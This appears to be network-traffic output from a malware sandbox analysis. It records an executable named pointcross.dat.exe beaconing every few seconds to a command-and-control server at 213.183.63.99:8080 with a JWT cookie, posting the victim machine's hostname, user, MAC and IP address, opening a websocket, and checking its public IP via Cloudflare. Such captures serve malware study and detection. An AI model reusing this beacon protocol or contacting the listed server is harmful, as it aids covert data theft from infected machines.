Nov 27, 2023 10:13:21.552275896 CET	357	OUT	GET /health HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip
Nov 27, 2023 10:13:21.754950047 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:13:21 GMT Content-Length: 0
Nov 27, 2023 10:13:22.318269968 CET	610	OUT	POST /device HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Length: 231 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip Data Raw: 7b 22 68 6f 73 74 6e 61 6d 65 22 3a 22 37 30 31 31 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 22 2c 22 75 73 65 72 5f 69 64 22 3a 22 4a 4f 4e 45 53 2d 50 43 5c 5c 6a 6f 6e 65 73 22 2c 22 6f 73 5f 6e 61 6d 65 22 3a 22 77 69 6e 64 6f 77 73 22 2c 22 6f 73 5f 61 72 63 68 22 3a 22 61 6d 64 36 34 22 2c 22 6d 61 63 5f 61 64 64 72 65 73 73 22 3a 22 65 63 3a 66 34 3a 62 62 3a 65 61 3a 31 35 3a 38 38 22 2c 22 6c 6f 63 61 6c 5f 69 70 5f 61 64 64 72 65 73 73 22 3a 22 38 39 2e 31 34 39 2e 31 38 2e 36 30 22 2c 22 70 6f 72 74 22 3a 22 38 30 38 30 22 2c 22 6c 6f 63 61 6c 65 5f 6c 61 6e 67 22 3a 22 65 6e 2d 43 48 22 2c 22 66 65 74 63 68 65 64 5f 75 6e 69 78 22 3a 31 37 30 31 30 37 36 34 30 30 7d Data Ascii: {"hostname":"701188","username":"","user_id":"user-PC\\user","os_name":"windows","os_arch":"amd64","mac_address":"ec:f4:bb:ea:15:88","local_ip_address":"89.149.18.60","port":"8080","locale_lang":"en-CH","fetched_unix":1701076400}
Nov 27, 2023 10:13:22.526499987 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:13:22 GMT Content-Length: 0
Nov 27, 2023 10:13:25.527757883 CET	357	OUT	GET /health HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip
Nov 27, 2023 10:13:25.730464935 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:13:25 GMT Content-Length: 0
Nov 27, 2023 10:13:26.294244051 CET	610	OUT	POST /device HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Length: 231 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip Data Raw: 7b 22 68 6f 73 74 6e 61 6d 65 22 3a 22 37 30 31 31 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 22 2c 22 75 73 65 72 5f 69 64 22 3a 22 4a 4f 4e 45 53 2d 50 43 5c 5c 6a 6f 6e 65 73 22 2c 22 6f 73 5f 6e 61 6d 65 22 3a 22 77 69 6e 64 6f 77 73 22 2c 22 6f 73 5f 61 72 63 68 22 3a 22 61 6d 64 36 34 22 2c 22 6d 61 63 5f 61 64 64 72 65 73 73 22 3a 22 65 63 3a 66 34 3a 62 62 3a 65 61 3a 31 35 3a 38 38 22 2c 22 6c 6f 63 61 6c 5f 69 70 5f 61 64 64 72 65 73 73 22 3a 22 38 39 2e 31 34 39 2e 31 38 2e 36 30 22 2c 22 70 6f 72 74 22 3a 22 38 30 38 30 22 2c 22 6c 6f 63 61 6c 65 5f 6c 61 6e 67 22 3a 22 65 6e 2d 43 48 22 2c 22 66 65 74 63 68 65 64 5f 75 6e 69 78 22 3a 31 37 30 31 30 37 36 34 30 34 7d Data Ascii: {"hostname":"701188","username":"","user_id":"user-PC\\user","os_name":"windows","os_arch":"amd64","mac_address":"ec:f4:bb:ea:15:88","local_ip_address":"89.149.18.60","port":"8080","locale_lang":"en-CH","fetched_unix":1701076404}
Nov 27, 2023 10:13:26.502710104 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:13:26 GMT Content-Length: 0
Nov 27, 2023 10:13:29.505604982 CET	357	OUT	GET /health HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip
Nov 27, 2023 10:13:29.708452940 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:13:29 GMT Content-Length: 0
Nov 27, 2023 10:13:30.266272068 CET	610	OUT	POST /device HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Length: 231 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip Data Raw: 7b 22 68 6f 73 74 6e 61 6d 65 22 3a 22 37 30 31 31 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 22 2c 22 75 73 65 72 5f 69 64 22 3a 22 4a 4f 4e 45 53 2d 50 43 5c 5c 6a 6f 6e 65 73 22 2c 22 6f 73 5f 6e 61 6d 65 22 3a 22 77 69 6e 64 6f 77 73 22 2c 22 6f 73 5f 61 72 63 68 22 3a 22 61 6d 64 36 34 22 2c 22 6d 61 63 5f 61 64 64 72 65 73 73 22 3a 22 65 63 3a 66 34 3a 62 62 3a 65 61 3a 31 35 3a 38 38 22 2c 22 6c 6f 63 61 6c 5f 69 70 5f 61 64 64 72 65 73 73 22 3a 22 38 39 2e 31 34 39 2e 31 38 2e 36 30 22 2c 22 70 6f 72 74 22 3a 22 38 30 38 30 22 2c 22 6c 6f 63 61 6c 65 5f 6c 61 6e 67 22 3a 22 65 6e 2d 43 48 22 2c 22 66 65 74 63 68 65 64 5f 75 6e 69 78 22 3a 31 37 30 31 30 37 36 34 30 38 7d Data Ascii: {"hostname":"701188","username":"","user_id":"user-PC\\user","os_name":"windows","os_arch":"amd64","mac_address":"ec:f4:bb:ea:15:88","local_ip_address":"89.149.18.60","port":"8080","locale_lang":"en-CH","fetched_unix":1701076408}
Nov 27, 2023 10:13:30.473292112 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:13:30 GMT Content-Length: 0
Nov 27, 2023 10:13:33.474473953 CET	357	OUT	GET /health HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip
Nov 27, 2023 10:13:33.677151918 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:13:33 GMT Content-Length: 0
Nov 27, 2023 10:13:34.234797001 CET	610	OUT	POST /device HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Length: 231 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip Data Raw: 7b 22 68 6f 73 74 6e 61 6d 65 22 3a 22 37 30 31 31 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 22 2c 22 75 73 65 72 5f 69 64 22 3a 22 4a 4f 4e 45 53 2d 50 43 5c 5c 6a 6f 6e 65 73 22 2c 22 6f 73 5f 6e 61 6d 65 22 3a 22 77 69 6e 64 6f 77 73 22 2c 22 6f 73 5f 61 72 63 68 22 3a 22 61 6d 64 36 34 22 2c 22 6d 61 63 5f 61 64 64 72 65 73 73 22 3a 22 65 63 3a 66 34 3a 62 62 3a 65 61 3a 31 35 3a 38 38 22 2c 22 6c 6f 63 61 6c 5f 69 70 5f 61 64 64 72 65 73 73 22 3a 22 38 39 2e 31 34 39 2e 31 38 2e 36 30 22 2c 22 70 6f 72 74 22 3a 22 38 30 38 30 22 2c 22 6c 6f 63 61 6c 65 5f 6c 61 6e 67 22 3a 22 65 6e 2d 43 48 22 2c 22 66 65 74 63 68 65 64 5f 75 6e 69 78 22 3a 31 37 30 31 30 37 36 34 31 32 7d Data Ascii: {"hostname":"701188","username":"","user_id":"user-PC\\user","os_name":"windows","os_arch":"amd64","mac_address":"ec:f4:bb:ea:15:88","local_ip_address":"89.149.18.60","port":"8080","locale_lang":"en-CH","fetched_unix":1701076412}
Nov 27, 2023 10:13:34.445873022 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:13:34 GMT Content-Length: 0
Nov 27, 2023 10:13:37.446865082 CET	357	OUT	GET /health HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip
Nov 27, 2023 10:13:37.654812098 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:13:37 GMT Content-Length: 0
Nov 27, 2023 10:13:38.216587067 CET	610	OUT	POST /device HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Length: 231 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip Data Raw: 7b 22 68 6f 73 74 6e 61 6d 65 22 3a 22 37 30 31 31 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 22 2c 22 75 73 65 72 5f 69 64 22 3a 22 4a 4f 4e 45 53 2d 50 43 5c 5c 6a 6f 6e 65 73 22 2c 22 6f 73 5f 6e 61 6d 65 22 3a 22 77 69 6e 64 6f 77 73 22 2c 22 6f 73 5f 61 72 63 68 22 3a 22 61 6d 64 36 34 22 2c 22 6d 61 63 5f 61 64 64 72 65 73 73 22 3a 22 65 63 3a 66 34 3a 62 62 3a 65 61 3a 31 35 3a 38 38 22 2c 22 6c 6f 63 61 6c 5f 69 70 5f 61 64 64 72 65 73 73 22 3a 22 38 39 2e 31 34 39 2e 31 38 2e 36 30 22 2c 22 70 6f 72 74 22 3a 22 38 30 38 30 22 2c 22 6c 6f 63 61 6c 65 5f 6c 61 6e 67 22 3a 22 65 6e 2d 43 48 22 2c 22 66 65 74 63 68 65 64 5f 75 6e 69 78 22 3a 31 37 30 31 30 37 36 34 31 36 7d Data Ascii: {"hostname":"701188","username":"","user_id":"user-PC\\user","os_name":"windows","os_arch":"amd64","mac_address":"ec:f4:bb:ea:15:88","local_ip_address":"89.149.18.60","port":"8080","locale_lang":"en-CH","fetched_unix":1701076416}
Nov 27, 2023 10:13:38.426301003 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:13:38 GMT Content-Length: 0
Nov 27, 2023 10:13:41.427298069 CET	357	OUT	GET /health HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip
Nov 27, 2023 10:13:41.629951954 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:13:41 GMT Content-Length: 0
Nov 27, 2023 10:13:42.188235044 CET	610	OUT	POST /device HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Length: 231 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip Data Raw: 7b 22 68 6f 73 74 6e 61 6d 65 22 3a 22 37 30 31 31 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 22 2c 22 75 73 65 72 5f 69 64 22 3a 22 4a 4f 4e 45 53 2d 50 43 5c 5c 6a 6f 6e 65 73 22 2c 22 6f 73 5f 6e 61 6d 65 22 3a 22 77 69 6e 64 6f 77 73 22 2c 22 6f 73 5f 61 72 63 68 22 3a 22 61 6d 64 36 34 22 2c 22 6d 61 63 5f 61 64 64 72 65 73 73 22 3a 22 65 63 3a 66 34 3a 62 62 3a 65 61 3a 31 35 3a 38 38 22 2c 22 6c 6f 63 61 6c 5f 69 70 5f 61 64 64 72 65 73 73 22 3a 22 38 39 2e 31 34 39 2e 31 38 2e 36 30 22 2c 22 70 6f 72 74 22 3a 22 38 30 38 30 22 2c 22 6c 6f 63 61 6c 65 5f 6c 61 6e 67 22 3a 22 65 6e 2d 43 48 22 2c 22 66 65 74 63 68 65 64 5f 75 6e 69 78 22 3a 31 37 30 31 30 37 36 34 32 30 7d Data Ascii: {"hostname":"701188","username":"","user_id":"user-PC\\user","os_name":"windows","os_arch":"amd64","mac_address":"ec:f4:bb:ea:15:88","local_ip_address":"89.149.18.60","port":"8080","locale_lang":"en-CH","fetched_unix":1701076420}
Nov 27, 2023 10:13:42.398011923 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:13:42 GMT Content-Length: 0
Nov 27, 2023 10:13:45.399152994 CET	357	OUT	GET /health HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip
Nov 27, 2023 10:13:45.602086067 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:13:45 GMT Content-Length: 0
Nov 27, 2023 10:13:46.174168110 CET	610	OUT	POST /device HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Length: 231 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip Data Raw: 7b 22 68 6f 73 74 6e 61 6d 65 22 3a 22 37 30 31 31 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 22 2c 22 75 73 65 72 5f 69 64 22 3a 22 4a 4f 4e 45 53 2d 50 43 5c 5c 6a 6f 6e 65 73 22 2c 22 6f 73 5f 6e 61 6d 65 22 3a 22 77 69 6e 64 6f 77 73 22 2c 22 6f 73 5f 61 72 63 68 22 3a 22 61 6d 64 36 34 22 2c 22 6d 61 63 5f 61 64 64 72 65 73 73 22 3a 22 65 63 3a 66 34 3a 62 62 3a 65 61 3a 31 35 3a 38 38 22 2c 22 6c 6f 63 61 6c 5f 69 70 5f 61 64 64 72 65 73 73 22 3a 22 38 39 2e 31 34 39 2e 31 38 2e 36 30 22 2c 22 70 6f 72 74 22 3a 22 38 30 38 30 22 2c 22 6c 6f 63 61 6c 65 5f 6c 61 6e 67 22 3a 22 65 6e 2d 43 48 22 2c 22 66 65 74 63 68 65 64 5f 75 6e 69 78 22 3a 31 37 30 31 30 37 36 34 32 34 7d Data Ascii: {"hostname":"701188","username":"","user_id":"user-PC\\user","os_name":"windows","os_arch":"amd64","mac_address":"ec:f4:bb:ea:15:88","local_ip_address":"89.149.18.60","port":"8080","locale_lang":"en-CH","fetched_unix":1701076424}
Nov 27, 2023 10:13:46.382072926 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:13:46 GMT Content-Length: 0
Nov 27, 2023 10:13:49.383274078 CET	357	OUT	GET /health HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip
Nov 27, 2023 10:13:49.586684942 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:13:49 GMT Content-Length: 0
Nov 27, 2023 10:13:50.138991117 CET	610	OUT	POST /device HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Length: 231 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip Data Raw: 7b 22 68 6f 73 74 6e 61 6d 65 22 3a 22 37 30 31 31 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 22 2c 22 75 73 65 72 5f 69 64 22 3a 22 4a 4f 4e 45 53 2d 50 43 5c 5c 6a 6f 6e 65 73 22 2c 22 6f 73 5f 6e 61 6d 65 22 3a 22 77 69 6e 64 6f 77 73 22 2c 22 6f 73 5f 61 72 63 68 22 3a 22 61 6d 64 36 34 22 2c 22 6d 61 63 5f 61 64 64 72 65 73 73 22 3a 22 65 63 3a 66 34 3a 62 62 3a 65 61 3a 31 35 3a 38 38 22 2c 22 6c 6f 63 61 6c 5f 69 70 5f 61 64 64 72 65 73 73 22 3a 22 38 39 2e 31 34 39 2e 31 38 2e 36 30 22 2c 22 70 6f 72 74 22 3a 22 38 30 38 30 22 2c 22 6c 6f 63 61 6c 65 5f 6c 61 6e 67 22 3a 22 65 6e 2d 43 48 22 2c 22 66 65 74 63 68 65 64 5f 75 6e 69 78 22 3a 31 37 30 31 30 37 36 34 32 38 7d Data Ascii: {"hostname":"701188","username":"","user_id":"user-PC\\user","os_name":"windows","os_arch":"amd64","mac_address":"ec:f4:bb:ea:15:88","local_ip_address":"89.149.18.60","port":"8080","locale_lang":"en-CH","fetched_unix":1701076428}
Nov 27, 2023 10:13:50.345881939 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:13:50 GMT Content-Length: 0
Nov 27, 2023 10:13:54.216346025 CET	357	OUT	GET /health HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip
Nov 27, 2023 10:13:54.419012070 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:13:54 GMT Content-Length: 0
Nov 27, 2023 10:13:54.979832888 CET	610	OUT	POST /device HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Length: 231 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip Data Raw: 7b 22 68 6f 73 74 6e 61 6d 65 22 3a 22 37 30 31 31 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 22 2c 22 75 73 65 72 5f 69 64 22 3a 22 4a 4f 4e 45 53 2d 50 43 5c 5c 6a 6f 6e 65 73 22 2c 22 6f 73 5f 6e 61 6d 65 22 3a 22 77 69 6e 64 6f 77 73 22 2c 22 6f 73 5f 61 72 63 68 22 3a 22 61 6d 64 36 34 22 2c 22 6d 61 63 5f 61 64 64 72 65 73 73 22 3a 22 65 63 3a 66 34 3a 62 62 3a 65 61 3a 31 35 3a 38 38 22 2c 22 6c 6f 63 61 6c 5f 69 70 5f 61 64 64 72 65 73 73 22 3a 22 38 39 2e 31 34 39 2e 31 38 2e 36 30 22 2c 22 70 6f 72 74 22 3a 22 38 30 38 30 22 2c 22 6c 6f 63 61 6c 65 5f 6c 61 6e 67 22 3a 22 65 6e 2d 43 48 22 2c 22 66 65 74 63 68 65 64 5f 75 6e 69 78 22 3a 31 37 30 31 30 37 36 34 33 33 7d Data Ascii: {"hostname":"701188","username":"","user_id":"user-PC\\user","os_name":"windows","os_arch":"amd64","mac_address":"ec:f4:bb:ea:15:88","local_ip_address":"89.149.18.60","port":"8080","locale_lang":"en-CH","fetched_unix":1701076433}
Nov 27, 2023 10:13:55.190088034 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:13:55 GMT Content-Length: 0
Nov 27, 2023 10:13:58.191363096 CET	357	OUT	GET /health HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip
Nov 27, 2023 10:13:58.394511938 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:13:58 GMT Content-Length: 0
Nov 27, 2023 10:13:59.242018938 CET	610	OUT	POST /device HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Length: 231 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip Data Raw: 7b 22 68 6f 73 74 6e 61 6d 65 22 3a 22 37 30 31 31 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 22 2c 22 75 73 65 72 5f 69 64 22 3a 22 4a 4f 4e 45 53 2d 50 43 5c 5c 6a 6f 6e 65 73 22 2c 22 6f 73 5f 6e 61 6d 65 22 3a 22 77 69 6e 64 6f 77 73 22 2c 22 6f 73 5f 61 72 63 68 22 3a 22 61 6d 64 36 34 22 2c 22 6d 61 63 5f 61 64 64 72 65 73 73 22 3a 22 65 63 3a 66 34 3a 62 62 3a 65 61 3a 31 35 3a 38 38 22 2c 22 6c 6f 63 61 6c 5f 69 70 5f 61 64 64 72 65 73 73 22 3a 22 38 39 2e 31 34 39 2e 31 38 2e 36 30 22 2c 22 70 6f 72 74 22 3a 22 38 30 38 30 22 2c 22 6c 6f 63 61 6c 65 5f 6c 61 6e 67 22 3a 22 65 6e 2d 43 48 22 2c 22 66 65 74 63 68 65 64 5f 75 6e 69 78 22 3a 31 37 30 31 30 37 36 34 33 37 7d Data Ascii: {"hostname":"701188","username":"","user_id":"user-PC\\user","os_name":"windows","os_arch":"amd64","mac_address":"ec:f4:bb:ea:15:88","local_ip_address":"89.149.18.60","port":"8080","locale_lang":"en-CH","fetched_unix":1701076437}
Nov 27, 2023 10:13:59.449899912 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:13:59 GMT Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	213.183.63.99	8080	6684	C:\Users\user\Desktop\pointcross.dat.exe

Timestamp	Bytes transferred	Direction	Data
Nov 27, 2023 10:11:57.761039019 CET	444	OUT	GET /client HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Connection: Upgrade Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Sec-WebSocket-Key: k8psyLMnFZs8POXNEVOcXQ== Sec-WebSocket-Version: 13 Upgrade: websocket X-Client: ec:f4:bb:ea:15:88
Nov 27, 2023 10:11:57.968113899 CET	183	IN	HTTP/1.1 101 Switching Protocols Upgrade: websocket Connection: Upgrade Sec-WebSocket-Accept: Z6VfA5UfamgdmfBCGnqBVkuZVTU=

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	104.16.133.229	443	6684	C:\Users\user\Desktop\pointcross.dat.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-27 09:11:57 UTC	108	OUT	GET /cdn-cgi/trace HTTP/1.1 Host: cloudflare.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2023-11-27 09:11:57 UTC	332	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 39 3a 31 31 3a 35 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 32 63 39 33 66 32 38 32 39 35 31 30 36 32 63 2d 49 41 44 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 44 45 4e 59 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 09:11:57 GMTContent-Type: text/plainTransfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *Server: cloudflareCF-RAY: 82c93f282951062c-IADX-Frame-Options: DENYX-Content-Type-Options:
